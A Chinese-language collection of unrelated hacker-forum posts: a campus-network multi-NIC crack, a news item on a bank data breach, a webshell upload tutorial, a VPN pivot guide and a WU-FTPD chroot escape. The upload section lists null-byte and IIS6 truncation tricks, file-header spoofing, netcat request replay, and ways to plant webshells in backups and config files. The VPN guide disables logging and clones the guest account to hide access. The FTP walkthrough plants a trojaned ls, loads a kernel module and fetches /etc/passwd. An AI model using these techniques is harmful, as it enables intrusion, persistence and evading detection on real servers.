2012年6月

话说很久以前,有一个小伙子,买了一台笔记本。在学校无法上网,于是他开通了赛尔网。宿舍其他人用的是联通网。故事就此开始。

很久以后的一天,宿舍断网了。

宿舍某骚人听说电脑可以开热点,便要求他建立热点。

“哇,多简单的事儿!”他想~

开始-控制面板-网络和Internet-网络和共享中心-设置新的连接或网络-建立无线网络……………

当!

检测到你开启了多块物理网卡,被强制下线!

#¥……&(……&&*

上网搜索各种办法。。

出来了。

原文

使用宽带共享WIFI热点
1. 更新无线网卡驱动到最新
2. 使用命令 netsh wlan show drive 查看网卡驱动是否支持网络承载
    如果支持进入下一步,否则还要更新驱动
3. 开启网络承载
    使用命令 netsh wlan set hostednetwork mode=allow ssid=wifiname key=password
4. 打开网络共享->更改适配器设置 便可查看最新加入的Wifi网络图标
    右击宽带连接->共享,设置为允许共享并且将家庭网络连接选择为刚刚加入的WIFI名称
5. 开启网络:netsh wlan start hostednetwork
6. 停止使用:netsh wlan stop hostednetwork

按照这步骤来一套。

好了。输入netsh wlan start hostednetwork。

当!!

检测到你开启了多块物理网卡,被强制下线!

@%¥&%*……&%(

我擦!咋办!上网搜垃圾赛尔网的多网卡限制破解!!

经过n多试验,找到一个可用文件。

点击以下网址下载。

http://115.com/file/c26hjnk4#赛尔多网卡破解补丁.7z


使用方法很简单,解压文件,运行里面的说明文档,按照说明来做就好啦!!

说明书是啥?好吧好吧,很简单,以下是说明书~~

先运行eth.exe,选择想让小蝴蝶识别的网卡,确定后会在当前目录生成一个interface文件,将这个文件和wpcap.dll和supplicant.exe

一同拷贝到小蝴蝶的安装目录下,ok。

看,多简单,童鞋们,尽情的爽吧~顺带说一句,如果你家里没有无线路由但是你想用你的小平板或者带wifi的手机上网的话也可以用上文中说的方法建立无线网哇~~

附件下载:

赛尔多网卡破解补丁

近日,一个名为Reckz0r的黑客在其Twitter上发了这么一条推特:“在过去的3个月里,我一直潜伏在79家银行的网络里。也许人们都以为我黑的是VISA & Mastercard,但事实上,我黑的是银行里的客户数据。”目前,Reckz0r已经获取了这些银行客户的大量数据,其中包括他们的名字、邮件地址、家庭住址和电话号码。而就在今天,好多人可以在AnonFiles.com的网站上下到这些数据。Reckz0r表示目前只有部分的信用卡信息被泄露出去,因为数量数量实在太庞大。据荷兰媒体报道,这次被泄露出去的文件有113页,500亿字节。

1.jpg

作为Anonymous和“UGNazi”的前成员,Reckz0r在Pastebin网站上发表了一篇文章,在文中他表示此次的攻击完全不是为了获取信息,他只是想在结束自己的黑客生涯之前再玩上一把。

与此同时,他还对被其黑过的受害者表示道歉;“在过去,我已经进行了50多次的大型黑客活动,泄露了大量的重要信息,如果您是其中的一个受害者,我在这里表示道歉。而此次的黑客是我的告别之作。以后,我不再是个黑客了,而是一个良民了。”

一、'\0'上传漏洞 + nc抓包上传:

整个流程上传漏洞主要就是利用'\0'字符漏洞,'\0'字符在系

统中被用作字符串结束的标志
基本原理就是网络程序虽然禁止了.asp等后缀名文件的上传,

但是都会允许.jpg或者.gif格式文件的上传。这样如果自己构造数据包 

formPath=UploadFile/shell.asp'\0 '.jpg,那么'\0 '后面的字符将被截断,原因是计算机遇

到'\0'字符,认为字符串结束了。于是我们就向服务器上传了一个名为shell.asp的ASP木马程序,后面的就不多说了,

webshell的功能已经很强大了,入侵过程:
条件:需要至少NC、WinSock Expert、UltraEdit三个工具和一个webshell程序
nc.exe(netcat) - 一个变形了的telnet,嗅探器,网络安全届的军刀!WinSock Expert - 抓包工具,可以截获网络通讯的数据流
UltraEdit - ......不说了,无人不知无人不晓-_-!webshell - ASP、PHP等木马程序1.第一步,打开目标系统的上
传页面,通过WinSock Expert监视,上传webshell.asp文件,再打开WinSock Expert,将截获的数据流存为文本文件
(两个send下面的所有内容,包括回车产生的空白行)
2.通过UltraEdit修改文本文件中的关键代码:
filename="C:\test\webshell.asp"   ,webshell.asp后加:1个空格及.jpg,然后跳到16进制编辑状态,修改16进制下空格
的20为00,Content-Length长度增加5。(一个字符算一个字节,' .jpg'一个5个字节)3.nc出场~!
指令:nc -vv www.xxx.com 80 < 1.txt
批注:此法貌似针对的是低版本iis.



二、明小子上传:这个不用多说,工具党的最爱。动易上传,动网上传等。关键是找到漏洞页面,
加以利用。上传类型通常为asp页面。(php,aspx之类的另算)几大cms的漏洞通杀,不可小视。



三、本地上传漏洞。js过滤了?没关系。本地构造一个上传页面exp,action直指上传页面便好。有时它会验证cookie。
没关系,wireshark或者直接Tamper data抓包修改便是,加密了就莫法了。感觉不如直接浏览器修改网页代码,且不如nc。



四、上传过滤:针对上传类型的过滤,一般会根据文件后缀进

行过滤。通常上传允许类型为jpg|png|gif|rar|tar|doc|txt|

等等。。

稍微总结了一下,有以下几种方法(欢迎大家补充):

1.iis6.0截断漏洞。

例子:将要上传的大马或者小马更名为 1.jpg;.asp 或者 1.jpg;.2.asp~有人说1.asp;.jpg之类的也行。。但我没成功过。那个囧啊。

。小小解释下。因为";"被iis6.0解析时产生了截断了。就不向后读了。所以判断类型为jpg.


2.二进制文件头判断上传类型。

UE打开已伪装成图片的大小马。。不知是哪个混蛋说的。直接记事本打开加不是更方便。。。

但还是在此附上一位不知名大能总结的文件头的标识。

{

   1.JPEG/JPG
- 文件头标识 (2 bytes): $ff, $d8 (SOI) (JPEG 文件标识) 
- 文件结束标识 (2 bytes): $ff, $d9 (EOI) 

2.TGA
- 未压缩的前5字节   00 00 02 00 00
- RLE压缩的前5字节   00 00 10 00 00

3.PNG
- 文件头标识 (8 bytes)   89 50 4E 47 0D 0A 1A 0A

4.GIF
- 文件头标识 (6 bytes)   47 49 46 38 39(37) 61
                        G  I  F  8  9 (7)  a

gif89a 有透明



gif87a 无透明



5.BMP
- 文件头标识 (2 bytes)   42 4D
                        B   M

6.PCX
- 文件头标识 (1 bytes)   0A

7.TIFF
- 文件头标识 (2 bytes)   4D 4D 或 49 49

8.ICO
- 文件头标识 (8 bytes)   00 00 01 00 01 00 20 20 

9.CUR
- 文件头标识 (8 bytes)   00 00 02 00 01 00 20 20

10.IFF
- 文件头标识 (4 bytes)   46 4F 52 4D
                        F  O  R  M

11.ANI
- 文件头标识 (4 bytes)   52 49 46 46
                        R  I  F  F

     根据这些文件头标识的收集,我可以写一个识别图像格

式的模块了。但是在写这个模块之前可以对收集到的文件头标

识进行优化,使得程序中字符串比对次数尽量的少。
1.JPEG我们知需要比对文件头的$ff, $d8这两个字符,而不用

读取最后的两个结束标识了。
2.TGA,ICO,CUR只需比对第三个与第五个字符即可。
3.PNG比对[89][50]这两个字符。
4.GIF比对[47][49][46]与第五个字符。

废话不多说了,利用内存流来判断文件的格式,其实判断文件

的前几个字节就可以简单的判断这个文件是什么类型的文件,

例如

jpg文件 是 FFD8 (从低位到高位就要反过来 D8FF 下面都是

一样)

BMP文件 是 424D ---4D42

}




额,就是这般,修改二进制文件头。或者记事本直接添加代码即可

。大多数时候这种上传检测不会检查后缀了。但也不乏一些变态网站。。


3.后台上传备份。

如果你已经拿到了后台,并且有数据库路径备份。那么恭喜你

,已经成功了一半。先上传。肿么上传我就不废话了。见上文。然后找到备份数据库处,将备份路径改为我们的马儿的路径。

备份文件名后缀都可以改。ok。接下来的东西你懂得。。



4.后台模版单页修改上大马。

还是利用iis6.0的截断漏洞。不过这次是修改单页内容。要文件名可改才行。

举个例。1.asp;1.html...



5.正常文件中插一句话?

一般而言,后台插一句话,如果数据库扩展名是asp的话,那么插数据库,但是如果有配置文件可以插的话,那肯定是插入

配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后台无法登陆,甚至

有可能是整个网站系统崩溃,所以插入配置文件,请慎之又慎。插入时,有时有过滤,这时分下网页源码。估计是单引号过滤

或者<>闭合等问题,不一而论。这里便不作详细分析了。


PS:数据库插一句话的话有时文件大了菜刀就连不上。灰常蛋疼。


6.远程命令执行oday利用

这个这个。没法举例子啊。以后有机会再举吧。



7.编辑器上传漏洞

常见网站的编辑器:

ewebeditor    
ewebeditornet      
fckeditor  
editor     
southidceditor   
SouthidcEditor  
bigcneditor  



至于详细漏洞,看清版本后,找谷哥和度娘去。。各种不解释。



嗯。。暂时就这么多了。。小菜一枚。。只是为了方便大家而整理总结润色的~


大牛勿喷,请一笑而过吧,小菜还是难得很花了点时间写东西。。。。

 


---------转自暗组

VPN可以应用在很多方面,很多公司只是拿它接入公司内部网络,但我们做安全的需要的是利用它做跳板上网(还有提高网速)。这篇文章主要是针对这种应用来说的,包括公网VPN的配置。

服务器配置

前奏:关闭防火墙

Windows
防火墙服务开启的话没法启用VPN
服务,所以要先关掉。

cmd下输入下面两条命令既可
:

sc config SharedAccess start=disabled

net stop SharedAccess

具体步骤:

1.开始-管理工具-路由和远程访问。在“机器名(本地)”上右键-配置并启用路由和远程访问。

2.下一步-自定义配置-勾选“VPN访问”“NAT和基本防火墙”-下一步-完成-是。

要点1:

A.这里要注意,vpn代理上网和vpn端口映射:一定记得选上“NAT和基本防火墙”,要不然下面IP路由选择展开后就不会有 NAT/基本防火墙”,VPN就不能代理上网。

B.如果是配置公网VPN则不用NAT.

 

3. 机器名(本地)上右键-属性-IP选项卡-点“静态IP地址”-添加,输入个范围,比如:10.0.0.1-10.0.0.10

 

要点2:

如果是配置公网VPN,这里要注意,要填入你所在网络的地址池内能分配到的空闲IP。很多国外XX服务器都拥有整个当前IPC段,当前网络总共有多少IP可以看子网掩码确定。具体哪些IP是空闲的,一般看能不能ping通,能不能访问80等服务,如果有连续的IP不能ping80这些端口也没开,那应该是空闲的。还可以ping一下各个ip之后,arp -a看看有没有arp出MAC地址(有时ping不同,arp也没有。但配好不能上网的话,就重新设置下IP),如果没有的话,一般是空闲的(除非是没开机)。

4.再切到日志选项卡-点选“不记录任何事件”-确定

 

配置公网VPN的话是不需要下面这一步的,vpn代理上网和vpn端口映射是需要这一步的

5. 展开IP路由选择-点一下“NAT/基本防火墙”-然后在右边空白处右键-新增接口-选择本地连接-确定。然后在弹出的属性框里点“公用接口连接到Internet”,点选“在此连接上启用NAT-确定

 

要点3:这里也要注意,新增接口的时候,一定要选择正确才能正常使用VPN。这里要选择服务器用来连接外网的那个连接,一般情况下都是本地连接,但是有很多注意是多网卡,这种情况选择的时候,你就要用ipconfig命令确认一下,选择ipconfig命令是公网IP的那个接口(连接),如果只有内网IP,这种情况一般是防火墙只映射了几个端口出去,估计没法做VPN,因为一般是连不进来的,除非是DMZ主机或者把1723端口也映射出去。



6.在“NAT/基本防火墙”上右键-属性-“常规”选项卡,点选“禁用事件日志”-确定。

7.需要vpn端口映射还需要配置:在“NAT/基本防火墙”选择刚才新增的接口,图片里为本地连接,点右键属性,在打开的菜单里选择“服务与端口”,然后点“添加”,添加自己想要映射的端口。“专用地址”里填写的是刚才在“静态IP地址”填写的一个地址。

 

要点:当客户机连接vpn服务器后,如果客户机的IP是这个专用地址,那么凡是通过传入端口(图片里为8000)与vpn服务器通信的信息都会被转到客户机的相应端口(图片里还是为8000)。想让一个客户机始终分配到这个专用IP,请看下面的拨入权限设置。

拨入权限设置:

这个很简单,我的电脑-右键-管理-本地用户和组-用户,在你想用于VPN的账号上右键-属性-“拨入”选项卡-远程访问权限那点选“允许访问”-确定,需要端口映射的就在“分配静态IP处”填写上面步所填写的“专用地址”。不需要则不必填写

注意如果是guest克隆账户,给他加了拨入权限之后,guest的“账户已禁用”会消失,所以要先给拨入权限再克隆,或者已经克隆了的话给了拨入后再克隆一遍。

 

客户端配置

先新建一个VPN连接(过程太简单,就不废话了),在它上面右键-属性-“网络”选项卡-双击“此连接使用下列项目”里面的“Internet协议TCP/IP-高级-“常规”选项卡-勾选“在远程网络上使用默认网关”。

以上步骤在Windows2000下也差的不多


 

 

 

 

 

 

 

 

 

 

可能顺序有点乱,大家凑合的看

这篇文章是对WU-FTPD设置了CHROOT后,配置出现的问题造成了突破CHROOT限制,并可以访问全部文件系统,我只是看到了这篇文章,感觉思路不错,就把其翻译了出来,由于时间仓促,没有对程序进行测试。这篇文章也是98年发表的文章,所以并不一定对现在最新的系统适用。------------了解思路吗!!!

下面是对WU-FTPD的测试,尽管任何FTP服务程序允许限制各种访问,但在用户目录下使用/bin/ls存在潜在的漏洞。

当我们增加一个新的用户到系统的时候(使用adduser,useradd等),新的用户就变成了他用户目录的属主,如:

drwx------ 2 user users 1024 Jun 21 11:26 /home/user/

问题出在当我们设置FTP服务器为了限制用户访问他们目录权利的时候,现在在我们的模拟系统中的用户home目录下建立一个目录结构:

/etc: 密码,组 . 

/bin: ls, compress, gzip... - 一些可以运行的两进制程序。 

/lib, /usr/lib: 一些需要的库文件。 

/dev: 为了建立连接某些操作系统需要访问的一些设备。

用户不需要改变他们的目录等属性,因为我们限制了他们的许可权利和把所有权归属给超级用户。

问题在于当我们做这个的时候,我们忘记了用户home目录的属主现在是归属于用户的。这样的话他可以改变此目录下的任意文件,下面的情况是很容易找到的:

drwxr-xr-x 6 user users 1024 Jun 21 11:26 /home/user/
drwx--x--x 2 root root 1024 Jun 21 11:26 /home/user/bin/

在这里用户user可以改变在他Home下的bin目录,(如果目录里的内容不归属于此用户,我们不能删除目录下的内容,但并不能阻止我们改名它):

OK,现在的要点在那里?我们可以看看wu.ftpd是怎样内部工作的:

当我们通过FTP(LIST命令)来请求一个目录列表的时候,FTP服务程序执行了/bin/ls,注意,这个ls一般是受限用户下的/bin/ls程序。

我们知道FTP服务程序是以ROOT身份来运行的,当一个用户访问受限制的FTP,服务程序会改变它的euid为用户uid。服务程序使用seteuid()来代替setuid()是为了重新获得超级用户的权利,但使用setuid()来操作是不可能的。

不管怎样,FTP服务程序执行了在chroot()后的用户目录下的/bin/ls,chroot()是改变了处理ROOT目录的方法。在chroot()以后进程只能访问文件系统的一部分,而且不能超越这个限制。

如果用户能修改/bin/ls,接着当我们运行LIST的时候,系统就会运行我们修改过的ls,并且这个程序是以euid等用户uid来执行,但这时uid=0,因为ls能调用setuid(0)并要重新获得超级用户的权利,虽然这时候还是在用户目录的限制状况下。

所以下面描述摆脱chroot()的限制:

就象我们上面刚刚说过,即使我们能执行任意代码,我们也只不过在choroot()后的文件系统里在运行,因为chroot()继承父进程到子进程,因此我们派生一个进程的话我们仍然限制于chroot().

ROOT目录进程处理的所有权在系统内存的进程表中存储着所有进程的信息(这个表只能是超级用户访问),因此我们只有能访问这张表,修改我们的ROOT目录并派生一个继承新ROOT目录的进程,我们就摆脱了chroot()的限制。

另外一个方法(FOR LINUX)是装载一个内核模块来捕获chroot()的系统调用,并修改它的可访问文件系统限制,或者干脆是给内核模块来来访问系统并执行任意代码。

实践:

thx:~# ftp
ftp> o ilm
Connected to ilm.
220 ilm FTP server (Version wu-2.4(4) Wed Oct 15 16:11:18 PDT 1997) ready.
Name (ilm:root): user
331 Password required for user.
Password:
230 User user logged in. Access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

用户连接到了机器并访问了他可以访问的系统,一连接后,FTP服务程序执行了chroot()到用户的home 目录:

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 5
drwxr-xr-x 5 user users 1024 Jun 21 11:26 .
drwxr-xr-x 5 user users 1024 Jun 21 11:26 ..
d--x--x--x 2 root root 1024 Jun 21 11:26 bin
drwxr-xr-x 2 root root 1024 Jun 21 11:26 etc
drwxr-xr-x 2 user users 1024 Jun 21 11:26 home
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 5
drwxr-xr-x 5 user users 1024 Jun 21 11:26 .
drwxr-xr-x 5 user users 1024 Jun 21 21:26 ..
d--x--x--x 2 root root 1024 Jun 21 11:26 bin
drwxr-xr-x 2 root root 1024 Jun 21 11:26 etc
drwxr-xr-x 2 user users 1024 Jun 21 11:26 home
226 Transfer complete.

用户被受限于他的home目录:

ftp> ls bin/ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
---x--x--x 1 root root 138008 Jun 21 11:26 bin/ls
226 Transfer complete.
ftp> ren bin bin.old
350 File exists, ready for destination name
250 RNTO command successful.
ftp> mkdir bin
257 MKD command successful.
ftp> cd bin
250 CWD command successful.
ftp> put ls
226 Transfer complete.
ftp> put insmod
226 Transfer complete.
ftp> put chr.o
226 Transfer complete.

修改ls两进制程序并上载所需文件

ftp> chmod 555 ls
200 CHMOD command successful.
ftp> chmod 555 insmod
200 CHMOD command successful

改变文件属性,这样可以来执行刚刚上载的文件。

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
UID: 0 EUID: 1002
Cambiando EUID...
UID: 0 EUID: 0
Cargando modulo chroot...
Modulo cargado.
226 Transfer complete.

运行修改过的ls并改变他的euid=0和装载木马模块。

ftp> bye
221 Goodbye.
thx:~#

这时,用户已经装载了内核模块并捕获和使chroot() syscall无效了

thx:~# ftp
ftp> o ilm
Connected to ilm.
220 ilm FTP server (Version wu-2.4(4) Wed Oct 15 16:11:18 PDT 1997) ready.
Name (ilm:root): user
331 Password required for user.
Password:
230 User user logged in. Access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

再次登陆,服务程序chroot()到用户目录,但这次由我们的内核模块进行了控制。

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 1697
drwxr-xr-x 21 root root 1024 Jun 21 11:57 .
drwxr-xr-x 21 root root 1024 Jun 21 11:57 ..
-rw-r--r-- 1 root root 118 Apr 21 11:26 .bash_history
drwxr-xr-x 2 root bin 2048 Jun 21 11:26 bin
drwxr-xr-x 2 root root 1024 Jun 8 11:26 boot
drwxr-xr-x 2 root root 1024 Oct 6 11:26 cdrom
drwxr-xr-x 3 root root 21504 Jun 21 15:26 dev
drwxr-xr-x 14 root root 3072 Jun 21 15:26 etc
drwxr-xr-x 7 root root 1024 Jun 21 19:26 export
drwxr-xr-x 7 root root 1024 Jun 21 19:26 home
dr-xr-xr-x 5 root root 0 Jun 21 14:26 proc
... 
-rw-r--r-- 1 root root 404717 Mar 12 18:06 vmlinuz
226 Transfer complete.

这时我们可以访问整个文件系统了。

ftp> get /etc/passwd
226 Transfer complete.

ftp> bye
221 Goodbye.
thx:~#

这是使用了可装载内核模块,假如你使用了其他修改文件等等的可装载内核模块,我们就可以获得更大的权利。

最好的解决办法是设置正确的目录属性:

ilm:~$ ls -ula /home/user
total 5
drwxr-xr-x 6 root root 1024 Jun 21 11:26 ./
drwxr-xr-x 8 root root 1024 Jun 21 11:26 ../
d--x--x--x 2 root root 1024 Jun 21 11:26 bin/
drwxr-xr-x 2 root root 1024 Jun 21 11:26 etc/
drwxr-xr-x 2 user users 1024 Jun 21 11:26 home/
ilm:~$

更好的办法是使用ProFTPD,因为ProFTPD要比WU-FTPD的安全性好不少。

参考:

1,模块代码下载:http://hispahack.ccc.de/wu-guest.tgz
2,wu-ftpd Resource Center --http://www.landfield.com/wu-ftpd/
3,ProFTPD -- http://www.proftpd.org/
4,原文:http://hispahack.ccc.de/en/mi009en.htm

路由器有功能叫端口映射。

所谓端口映射其实就是:外网都访问路由器的IP地址,但是用不同的端口号。路由器将不同的端口号对应到不同的计算机上。

0x01.jpg 

192.168.0.104对应的是1234端口。

192.168.0.100对应的是1235端口。



那么外网访问:

路由器IP:1234  其实就是 192.168.0.104:1234

路由器IP:1235  其实就是 192.168.0.100:1235



基于这个道理。我们可以修改路由器内的每台电脑远程桌面的端口号,第一台电脑改为1234.第二台电脑改为1235.

修改远程桌面的端口号办法:

修改注册表两个键值:

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp中“PortNumber”的数值

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp中“PortNumber”的数值

注意:十进制!!

0x02.jpg 

重启电脑,端口号就会生效。同时记得开启我的电脑属性里的允许远程桌面。

以上操作完成。

访问  路由器IP地址:1234就是远程到192.168.0.104的桌面。

访问  路由器IP地址:1235就是远程到192.168.0.100的桌面。

如果是windows7系统,而且你的网络连接选择的是公用网络,请进入windows防火墙关闭防火墙,或者添加例外。



最后,以上方法不可行的话。解决办法,一个路由器对于一台电脑。即DMZ主机。

设置为DMZ的电脑,就和路由器一样的地位。访问路由器就是访问该电脑。

0x03.jpg 

这样设置的话,不需要修改远程桌面的端口,直接输入路由器IP地址就行。缺点是,只能远程一台电脑的桌面。